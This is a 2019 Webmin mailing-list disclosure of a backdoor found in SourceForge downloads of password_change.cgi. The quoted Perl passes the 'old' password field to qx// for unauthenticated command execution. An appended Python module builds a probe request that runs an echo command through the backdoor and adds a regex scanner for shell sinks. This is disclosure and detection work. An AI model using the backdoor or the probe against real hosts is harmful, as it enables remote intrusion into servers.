From: Adam H. <ad...@gm...> - 2019-08-17 21:50:27
To clarify my last email, you can run it without any auth cookie, and use
any username and "old" password. The "new" passwords have to match so it
gets that far, and passwd_mode=2 has to be set in miniserver.conf.
On Sat, Aug 17, 2019 at 5:47 PM Adam Hostetler <ad...@gm...> wrote:
> From my testing you can exploit it without knowing the password or even a
> username
>
> On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:
>
>> Thanks, I'm looking into this now. I'm guessing off hand that it's not
>> remotely exploitable without an existing login since the password change
>> cgi can't be run unless you're already logged in.
>>
>> On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:
>>
>> I believe the downloads hosted by SourceForge are compromised. They
>> contain a backdoor in the password_change.cgi; this is related to the
>> "0day" a few days ago. The code does not appear in the current GitHub repo
>> nor in any commits in the past.
>>
>> Backdoor code:
>> if ($wuser) {
>>         # Update Webmin user's password
>>         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
>>         $enc eq $wuser->{'pass'} ||
>>                 &pass_error($text{'password_eold'},qx/$in{'old'}/);
>>         $perr = &acl::check_password_restrictions($in{'user'},
>>                                                    $in{'new1'});
>>         $perr && &pass_error(&text('password_enewpass', $perr));
>>         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
>>
>> The "old" password is passed to qx, which executes it as a system command.
>>
>> See
>> https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/
>>
>>
>> -
>> Forwarded by the Webmin mailing list at
>> web...@li...
>> To remove yourself from this list, go to
>> http://lists.sourceforge.net/lists/listinfo/webadmin-list
>>
>
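What the thread describes, as an added example that is neither part of the original posts nor Webmin's own code: the backdoored line interpolates $in{'old'} into qx//, so whatever is sent as the "old" password runs as a shell command, and because its output is handed to pass_error() it comes back in the error page. The module below (a) builds the form fields that reach that line, using the field names user/old/new1/new2 from the quoted snippet (new2 is assumed from "the new passwords have to match"; no other fields are assumed), with a random nonce echoed so a triggered backdoor can be recognised in the response without running anything harmful, and (b) scans a CGI source file for Perl shell sinks that interpolate CGI input, which is the check one would run across a SourceForge tarball versus the GitHub tree. The "clean" snippet is an assumption of what the upstream line looks like without the qx// argument; the sample response text is constructed.

```python
"""Added example: probe form and source scan for the password_change.cgi backdoor."""
import re
import secrets
from urllib.parse import urlencode


def build_probe_form(nonce: str, user: str = "root") -> dict:
    """Form fields for POST /password_change.cgi that reach the qx// line.

    Field names are the ones visible in the quoted snippet. The new passwords
    only need to match each other (assumed: new2 mirrors new1). The "old"
    value is a shell command whose output will surface in the error page.
    """
    return {
        "user": user,                 # any username, per the thread
        "old": f"echo {nonce}",       # executed by qx/$in{'old'}/
        "new1": "x",
        "new2": "x",
    }


def encode_probe(form: dict) -> str:
    """application/x-www-form-urlencoded body for the POST."""
    return urlencode(form)


def backdoor_triggered(response_body: str, nonce: str) -> bool:
    """True if the command output (our nonce) was echoed back via pass_error()."""
    return nonce in response_body


# Perl shell sinks fed by CGI input: qx//, backticks, system()/exec() with $in{...}
SHELL_SINKS = re.compile(
    r"(qx[/{(|!][^/})|!]*\$in\{"     # qx/... $in{...} .../
    r"|`[^`]*\$in\{"                 # `... $in{...} ...`
    r"|\b(?:system|exec)\s*\(?[^;]*\$in\{)"
)


def scan_cgi_source(src: str) -> list:
    """Return (line_number, line) for every line that passes $in{...} to a shell."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        if SHELL_SINKS.search(line):
            hits.append((n, line.strip()))
    return hits


# Constructed sample: the snippet quoted in the thread (backdoored)...
BACKDOORED_SNIPPET = """\
if ($wuser) {
        # Update Webmin user's password
        $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});
        $enc eq $wuser->{'pass'} ||
                &pass_error($text{'password_eold'},qx/$in{'old'}/);
        $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});
        $perr && &pass_error(&text('password_enewpass', $perr));
        $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});
        }
"""

# ...and an assumed clean version: identical except pass_error() gets no qx// argument.
CLEAN_SNIPPET = BACKDOORED_SNIPPET.replace(
    "&pass_error($text{'password_eold'},qx/$in{'old'}/);",
    "&pass_error($text{'password_eold'});",
)


if __name__ == "__main__":
    nonce = secrets.token_hex(8)
    print("POST body:", encode_probe(build_probe_form(nonce)))
    print("backdoored hits:", scan_cgi_source(BACKDOORED_SNIPPET))
    print("clean hits:", scan_cgi_source(CLEAN_SNIPPET))
```

Sending the probe only makes sense against a host you are authorised to test; the point of the nonce is that a hit is unambiguous (the echoed string appears in the "incorrect password" error) while the command itself does nothing. The scanner is deliberately broader than the one qx// call on the page so that a backticks or system() variant of the same sink would also be flagged when diffing a download against the repository.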